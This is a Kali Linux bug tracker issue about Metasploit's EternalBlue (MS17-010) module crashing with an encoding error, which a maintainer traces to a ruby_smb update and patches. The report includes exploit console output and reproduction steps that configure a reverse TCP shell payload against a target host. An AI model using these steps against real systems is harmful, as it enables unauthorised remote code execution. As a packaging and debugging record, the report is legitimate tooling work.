View Issue Details

IDProjectCategoryView StatusLast Update
0007672Kali LinuxKali Package Bugpublic2022-04-18 19:55
Reporter4oo4 Assigned Todaniruiz  
PrioritynormalSeverityminorReproducibilityalways
Status resolvedResolutionfixed 
Product Version2022.1 
Fixed in Version2022.2 
Summary0007672: Metasploit 6.1.37 - ms17_010_eternalblue module - Encoding::UndefinedConversionError
Description

Metasploit's EternalBlue module crashes with Encoding::UndefinedConversionError when attempting to make an SMB connection:

msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit

[] Started reverse TCP handler on 10.9.0.13:4444
[
] 10.10.17.29:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.10.17.29:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[] 10.10.17.29:445 - Scanned 1 of 1 hosts (100% complete)
[+] 10.10.17.29:445 - The target is vulnerable.
[
] 10.10.17.29:445 - Connecting to target for exploitation.
[+] 10.10.17.29:445 - Connection established for exploitation.
[+] 10.10.17.29:445 - Target OS selected valid for OS indicated by SMB reply
[] 10.10.17.29:445 - CORE raw buffer dump (42 bytes)
[
] 10.10.17.29:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes
[] 10.10.17.29:445 - 0x00000010 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76 sional 7601 Serv
[
] 10.10.17.29:445 - 0x00000020 69 63 65 20 50 61 63 6b 20 31 ice Pack 1
[+] 10.10.17.29:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[] 10.10.17.29:445 - Trying exploit with 12 Groom Allocations.
[
] 10.10.17.29:445 - Sending all but last fragment of exploit packet
[] 10.10.17.29:445 - Starting non-paged pool grooming
[-] 10.10.17.29:445 - Encoding::UndefinedConversionError
[-] 10.10.17.29:445 - "\xF0" to UTF-8 in conversion from ASCII-8BIT to UTF-8 to UTF-16LE
[-] 10.10.17.29:445 - /usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/ruby_smb-3.1.0/lib/ruby_smb/field/stringz16.rb:6:in encode' /usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/ruby_smb-3.1.0/lib/ruby_smb/field/stringz16.rb:6:inassign'
(eval):2:in assign' /usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/bindata-2.4.10/lib/bindata/struct.rb:190:inblock in define_field_accessors_for'
/usr/share/metasploit-framework/modules/exploits/windows/smb/ms17_010_eternalblue.rb:1574:in make_smb1_free_hole_session_packet' /usr/share/metasploit-framework/modules/exploits/windows/smb/ms17_010_eternalblue.rb:1380:insmb1_free_hole'
/usr/share/metasploit-framework/modules/exploits/windows/smb/ms17_010_eternalblue.rb:1221:in smb_eternalblue' /usr/share/metasploit-framework/modules/exploits/windows/smb/ms17_010_eternalblue.rb:1132:inblock in exploit_eb'
/usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/activesupport-6.1.5/lib/active_support/core_ext/range/each.rb:9:in each' /usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/activesupport-6.1.5/lib/active_support/core_ext/range/each.rb:9:ineach'
/usr/share/metasploit-framework/modules/exploits/windows/smb/ms17_010_eternalblue.rb:1130:in exploit_eb' /usr/share/metasploit-framework/modules/exploits/windows/smb/ms17_010_eternalblue.rb:315:inexploit'
/usr/share/metasploit-framework/lib/msf/core/exploit_driver.rb:228:in job_run_proc' /usr/share/metasploit-framework/lib/msf/core/exploit_driver.rb:181:inrun'
/usr/share/metasploit-framework/lib/msf/base/simple/exploit.rb:144:in exploit_simple' /usr/share/metasploit-framework/lib/msf/base/simple/exploit.rb:171:inexploit_simple'
/usr/share/metasploit-framework/lib/msf/ui/console/command_dispatcher/exploit.rb:45:in exploit_single' /usr/share/metasploit-framework/lib/msf/ui/console/command_dispatcher/exploit.rb:182:incmd_exploit'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:581:in run_command' /usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:530:inblock in run_single'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:524:in each' /usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:524:inrun_single'
/usr/share/metasploit-framework/lib/rex/ui/text/shell.rb:162:in run' /usr/share/metasploit-framework/lib/metasploit/framework/command/console.rb:48:instart'
/usr/share/metasploit-framework/lib/metasploit/framework/command/base.rb:82:in start' /usr/bin/msfconsole:23:in<main>'
[
] Exploit completed, but no session was created.

Steps To Reproduce
  • Run Metasploit
  • msf6 > use exploit/windows/smb/ms17_010_eternalblue
  • msf6 > set payload windows/x64/shell/reverse_tcp
  • msf6 > set RHOSTS 1.2.3.4
  • msf6 > set LHOST 1.2.3.5
  • msf 6 >exploit
Additional Information

Version 6.1.39-dev of MetaSploit from the Rapid7 repo does hot have this issue.

Activities

daniruiz

daniruiz

2022-04-18 14:09

manager   ~0016047

I've tested it with the latest version of metasploit-framework 6.1.38 and the issue is present, but it does work properly in 6.1.37

daniruiz

daniruiz

2022-04-18 16:27

manager   ~0016048

The issue was introduced with the package version 6.1.37-0kali2, that's why it still works with 6.1.37-0kali1, and seems to be caused by a ruby dependency

daniruiz

daniruiz

2022-04-18 17:41

manager   ~0016049

The issue is caused by the update of ruby_smb from 3.0.6 to 3.1.0. Changing the version and building the package again fixes the issue. I'll patch it and fill the bug report

daniruiz

daniruiz

2022-04-18 18:07

manager   ~0016050

Bug report https://github.com/rapid7/metasploit-framework/issues/16468

daniruiz

daniruiz

2022-04-18 19:54

manager   ~0016051

There's already a fix in metasploit-framework https://github.com/rapid7/metasploit-framework/commit/7c8c0b5e05dc6cea1a29461e6564c5ceccd80114
I've patched kali's package and will be soon updated to the repositories

Issue History

Date Modified Username Field Change
2022-04-18 01:46 4oo4 New Issue
2022-04-18 14:09 daniruiz Assigned To => daniruiz
2022-04-18 14:09 daniruiz Status new => confirmed
2022-04-18 14:09 daniruiz Note Added: 0016047
2022-04-18 16:27 daniruiz Note Added: 0016048
2022-04-18 17:41 daniruiz Note Added: 0016049
2022-04-18 18:07 daniruiz Note Added: 0016050
2022-04-18 18:46 daniruiz Assigned To daniruiz =>
2022-04-18 18:46 daniruiz Assigned To => daniruiz
2022-04-18 18:46 daniruiz Status confirmed => assigned
2022-04-18 19:54 daniruiz Note Added: 0016051
2022-04-18 19:55 daniruiz Status assigned => closed
2022-04-18 19:55 daniruiz Resolution open => fixed
2022-04-18 19:55 daniruiz Fixed in Version => 2022.2
2022-04-18 19:55 daniruiz Status closed => resolved